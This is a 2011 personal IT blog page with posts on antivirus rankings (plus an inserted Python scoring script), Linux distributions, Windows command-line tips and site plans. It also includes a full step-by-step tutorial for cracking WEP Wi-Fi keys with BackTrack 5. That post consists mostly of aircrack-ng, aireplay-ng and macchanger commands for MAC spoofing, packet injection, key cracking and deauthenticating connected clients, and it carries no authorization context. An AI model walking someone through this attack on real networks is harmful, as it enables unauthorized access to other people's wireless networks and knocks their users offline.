XeoShift

Changing how IT's done


Welcome to XeoShift, a site dedicated to helping IT guys & tech-savvy users get the most out of their PCs.


Antivirus Breakdown

Posted by Sean McCall on July 27, 2011 at 9:09 AM | Comments (0)

Best:

  • Kaspersky      $64.95   1 Year  3 PCs
  • BitDefender    $59.95   1 Year  3 PCs
  • F-Secure       $59.99   1 Year  3 PCs

Better:

  • Panda          $59.99   1 Year  1 PC
  • Symantec       $49.99   1 Year  3 PCs
  • G Data         $34.95   1 Year  1 PC

Good:

  • AVG            $54.99   1 Year  1 PC
  • Sophos        $136.50   1 Year  3 PCs*
  • Avast          $39.99   1 Year  1 PC
  • TrustPort*     $54.95   1 Year  1 PC
  • eScan*         $45.95   1 Year  1 PC
  • ESET*          $59.99   1 Year  1 PC
  • TrendMicro*    $34.95   1 Year  3 PCs

Average:

  • Webroot*       $79.95   1 Year  3 PCs
  • PC Tools*      $49.99   1 Year  3 PCs
  • Avira*         $49.99   1 Year  1 PC
  • Microsoft*     Free
  • K7*            $49.96   1 Year  1 PC
  • McAfee*        $39.99   1 Year  3 PCs
  • Comodo*        $39.99   1 Year  3 PCs*

* Difficult to interpret data

I used AV-TEST & AV-Comparatives for this breakdown. It took a while to merge their data, but I managed to come up with a method to the madness for future reference:

  • AV-Test Protection: +5.25
  • AV-Comparatives Compromised: -2.0%
  • AV-Comparatives Blocked: +97%
  • AV-Test Repair: +4.75
  • AV-Test Usability: +4.5
  • AV-Comparatives User Dependent: Divide by 2 & add half to Blocked & half to Compromised

Using this as minimum requirements for software, very few can be called Best or Better. As you can see though, the only free software in this list is from Microsoft, and it's in the Average section, which could be called the Average/Bad section. 2 obvious "rip-offs" exist: Sophos & Webroot. Sophos is mostly intended for business use though, which is why such a small license costs so much. Kaspersky really took the charge with this one though; it's worth that extra $5 if one cares to invest. If one is looking for a deal, G Data has you covered there. And now, if you're like me and prefer free, you may have noticed already that many of the above offer free versions. Use this as a baseline for what they can really do.
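As an added example (not the author's code), here is the merge rule and the minimum requirements above written out as a Python check. The post does not say how many missed thresholds put a product in Best, Better, Good or Average, so the function only reports which minimums a product fails; the product names and lab figures in SAMPLE_RESULTS are constructed for illustration, not real AV-TEST or AV-Comparatives results.

```python
# Added example (not the author's code): the post's merged AV-TEST /
# AV-Comparatives thresholds as a baseline check. The figures in
# SAMPLE_RESULTS are constructed for illustration, not real lab results.
from dataclasses import dataclass

# Minimum requirements from the post. AV-TEST categories use its 0-6 scale;
# AV-Comparatives figures are percentages of the test set.
MIN_AVTEST_PROTECTION = 5.25
MIN_AVTEST_REPAIR = 4.75
MIN_AVTEST_USABILITY = 4.5
MIN_AVC_BLOCKED = 97.0
MAX_AVC_COMPROMISED = 2.0


@dataclass(frozen=True)
class LabResult:
    name: str
    protection: float      # AV-TEST Protection score
    repair: float          # AV-TEST Repair score
    usability: float       # AV-TEST Usability score
    blocked: float         # AV-Comparatives Blocked %
    user_dependent: float  # AV-Comparatives User Dependent %
    compromised: float     # AV-Comparatives Compromised %


def fold_user_dependent(blocked, user_dependent, compromised):
    """Apply the post's rule for the 'User Dependent' column: split it in
    half, crediting one half to Blocked and charging the other half to
    Compromised. Returns the adjusted (blocked, compromised) pair."""
    half = user_dependent / 2.0
    return blocked + half, compromised + half


def failed_criteria(result):
    """Return the names of the thresholds the product misses (empty = passes).
    The post does not map a number of misses to a tier, so this only reports
    which minimum requirements are not met."""
    blocked, compromised = fold_user_dependent(
        result.blocked, result.user_dependent, result.compromised)
    checks = [
        ("AV-Test Protection", result.protection >= MIN_AVTEST_PROTECTION),
        ("AV-Comparatives Compromised", compromised <= MAX_AVC_COMPROMISED),
        ("AV-Comparatives Blocked", blocked >= MIN_AVC_BLOCKED),
        ("AV-Test Repair", result.repair >= MIN_AVTEST_REPAIR),
        ("AV-Test Usability", result.usability >= MIN_AVTEST_USABILITY),
    ]
    return [name for name, ok in checks if not ok]


def meets_baseline(result):
    return not failed_criteria(result)


# Constructed sample rows (hypothetical product names and numbers).
SAMPLE_RESULTS = [
    LabResult("ProductA", 5.5, 5.0, 5.0, 97.0, 2.0, 1.0),  # passes after the fold
    LabResult("ProductB", 5.0, 4.5, 5.0, 95.0, 2.0, 3.0),  # misses several minimums
    LabResult("ProductC", 5.5, 5.0, 4.0, 98.5, 0.0, 1.5),  # misses usability only
]


def summarize(results=SAMPLE_RESULTS):
    """Map each product name to its list of failed thresholds."""
    return {r.name: failed_criteria(r) for r in results}


if __name__ == "__main__":
    for name, misses in summarize().items():
        print(f"{name}: {'meets baseline' if not misses else ', '.join(misses)}")
```

Note that the fold can push a product over the Compromised limit even when its raw Compromised figure is fine (ProductA sits exactly on the 2.0% limit after the fold), which is the point of the author's rule: user-dependent outcomes are not counted as clean blocks.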


"Worst Quarter in History for Malware Infections"

Posted by Sean McCall on July 11, 2011 at 10:01 AM | Comments (0)

After viewing a few statistics from around the web, I came up with this pie chart to break down which malware infection methods have had the largest effect during this outbreak. Obviously Trojans have the majority. The simplest way to avoid Trojans is to not download from untrusted sources on the web, email, P2P, etc. Secondly, be sure to have an up-to-date antivirus with active file protection, meaning it is always scanning new files. This is one of the main factors of antivirus software that can slow your computer down. Most decent antivirus products can be set to only scan certain areas, like your Downloads & Temporary folders. This opens holes in your security, but in the end, most of the time it comes down to balancing performance with security to provide the best user experience.

Old Linux Top Ten List

Posted by Sean McCall on July 5, 2011 at 4:34 PM | Comments (0)

TOP 5 (6):

  Ubuntu
  openSUSE
  Fedora/Mint
  Debian
  Mandriva

TOP 10 (13):

  PCLinuxOS*
  Puppy*
  Sabayon/Arch^
  CentOS"/Slackware^
  MEPIS"

* = No 64-bit version
^ = CLI-based install
" = Lacking modern filesystems

Praising CLI (Command Line Interface)

Posted by Sean McCall on June 23, 2011 at 2:18 PM | Comments (0)

Nothing beats being able to fully script exactly what you want to do, and that's what the CLI is good for. A lot of the time it also lets you view things a GUI wouldn't (although it should in a lot of cases). Running something via CLI usually has performance advantages as well, and unlike some GUIs (e.g. Explorer.exe), one hang-up doesn't prevent you from using everything else (e.g. a locked-up file copy). One of the first things I do personally on a Windows box is force cmd.exe to open with Administrative credentials. This is both a convenience & prevents limited users from fooling around. I also like to run a .reg with the following:


Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment]
; .reg string values must be quoted, and a backslash inside them is written as \\
"Prompt"="[%computername%\\%username%] $_$p$g"


That way I know whether I'm executing a command on my local machine or remotely. There are so many useful commands; a good handful for networking are:


getmac /S (Find out the MAC address of a remote machine)

net time /domain:domain.name.com /set (Sync system time with the DC)

ping -a ::1 (Ping & attempt to resolve the host name (using the IPv6 localhost since it's super short))

pathping (Basically see where the hang-ups are when trying to connect to a host)

ipconfig /displaydns (See what sites users may have been going to, even if they delete their history)

arp -d (Good to run on all clients if a NIC was just switched out on a server, etc.)

nslookup
            server serverIP
            set type=SRV (Standard probe for DNS server info)

netsh wlan show networks interface="Wireless Network Connection" mode=bssid (CLI version of nearby wireless networks; it tells a whole lot more than the GUI)

Revamping the website/everything

Posted by Sean McCall on June 22, 2011 at 3:31 PM | Comments (0)

I've noticed this site is becoming less of a trial-run venture and more of a professional eye-sore. That being said, I want to redo just about everything or move somewhere else. Webs still meets my needs, but that might quickly change. I'd like to start recording tutorials (Perhaps with CamStudio, I'm currently tweaking with it again) on how to use the apps in the Download section & upload them to my Youtube channel, which is also in the same state as the site. I also need to recreate the Facebook Connect log-in since after deactivating my account for a week, it seems to have broken that.

Now, if I do move, I think I will be using WordPress and I'll definitely find a better way to present the Downloads section so that descriptions are present. I'd very much like to use the APIs provided by Alternativeto.net to accomplish this. (I fear that's gonna be pretty difficult.) I think I'd also like to use SMF forums, since they're familiar to me, but if that starts complicating a single log-in, I'll use another that will. I also might start using Ustream again since I have a new webcam, but I don't have decent internet service at the moment. (Using the neighbor's.) If I did, I'd come up with an episode format, have a dedicated IRC channel & upload all recordings to Youtube.

I know this all sounds fine & dandy, but it's also things I've considered before but didn't manage to make happen. For now everything is in the air, and the main thing that could be useful is support and/or people who'd like to join in. In a way, that'd be the easiest option for me as well. I wouldn't mind joining up with a group that has all this figured out. That wouldn't totally kill off my own pursuits, but it would fulfill some of them to a degree.

I think for now I'll try my hand at everything & record while it happens. Maybe that way others can learn from it too. That's kinda the new core idea for the site anyway, being a standby free tech support solution doesn't really sell so to speak.

How to crack WEP with BackTrack 5

Posted by Sean McCall on June 1, 2011 at 3:05 PM | Comments (15)

1.)  Start monitor mode:

airmon-ng

        Copy down interface

airmon-ng start (interface)

        If it says "mon0" or "wifi0" is used, this is your new interface

        If it says other things are running, type "kill (PID#)" for each

 

2.)  Injection test:

aireplay-ng -9 (interface)

        The APs that send pings back can be injected

        Copy down your target's BSSID, channel & ESSID

aireplay-ng -9 -e (ESSID) -a (BSSID) (interface)

        This lets you test specifically; can be useful for verifying hidden SSIDs or alternative BSSIDs

 

3.)  Target a specific channel:

airmon-ng start (interface) (channel)

 

4.)  Change MAC:

airmon-ng stop (interface(s))

ifconfig (interface) down

macchanger --mac (faked:mac) (interface)

        Copy down faked:mac

 

5.)  Begin packet capture:

airodump-ng -c (channel) -w (dump-name) --bssid (BSSID) (new interface)

        Keep an eye out for authenticating clients' MACs under Station

        If found & step 6 isn’t going well, go back to step 4 and use that MAC

        You may have to stop the monitoring interface & the physical one

 

6.)  Fake authentication:

*Put in second shell*

aireplay-ng -1 0 -a (BSSID) -h (faked:mac) (interface)

        Successful authentication will continually send keep-alive packets

        Using "aireplay-ng -1 6000 -o 1 -q 10 -a (BSSID) -h (faked:mac) (interface)" may help for picky routers

 

7.)  ARP replay:

*Put in third shell*

aireplay-ng -3 -b (BSSID) -h (faked:mac) (interface)


8.)  Crack WEP key:

*Put in a fourth shell*

aircrack-ng -b (BSSID) (dump-name)-01.cap

        A minimum of around 10,000 to 20,000 IVs is needed to crack a 64-bit key & about 40,000 to 85,000 for 128-bit

        Try "aircrack-ng -n 64 (dump-name)*cap" every 10,000 IVs

        If you know the start of the key in hexadecimal, try running "-d #" where # is the beginning characters

        If key bytes are all numbers, try running with "-t" to assume an all numeric key

        Add -x2 to brute force the last 2 bytes

        If you reach 2,000,000, try changing the fudge factor to "-f 4" & run 30 minutes to an hour

        Retry with the fudge factor increased by 4 more if that's unsuccessful

        If key bytes all start with similar numbers, try running with "-h" to assume an all ASCII key

        Add -x if trying with very few IVs to prevent brute forcing the last 2 bytes


*    Other attack methods:

Injection attack with 2 wireless cards:

        aireplay -9 -i (receiving interface) (injecting interface)

                If it fails on Attack -5, make sure the injection interface MAC matches the current card MAC

 

Deauthentication attack:

        aireplay-ng --deauth 5 -a (BSSID) -c (faked:mac) (interface)

                Can be faster than an ARP replay, but you must know the MAC of an authenticated client who's online

                This will disconnect the authenticated client, so they may become suspicious

Quick Topic Ideas & Links

Posted by Sean McCall on February 4, 2011 at 12:52 PM | Comments (0)

Router:  Wifi Channel, Security, DNS server (https://store.opendns.com/setup/router/), DNS Spoof (https://www.grc.com/dns/dns.htm)

Computer:  TCP/IP (http://www.speedguide.net/downloads.php), Sysinternals Autologon + Auto Logon & Lock (http://torch.freeweb7.com/autologon.html) - I should make a better installer/zip everything together for a simple download, etc., Services (what blackviper has wrong/what's best practice, etc.), Scheduled Tasks w/ Process Explorer + Preme, Recover from RAM, Uninstall IE Flash (http://kb2.adobe.com/cps/141/tn_14157.html), USB Boot Tutorial, New Homepage/Website Idea
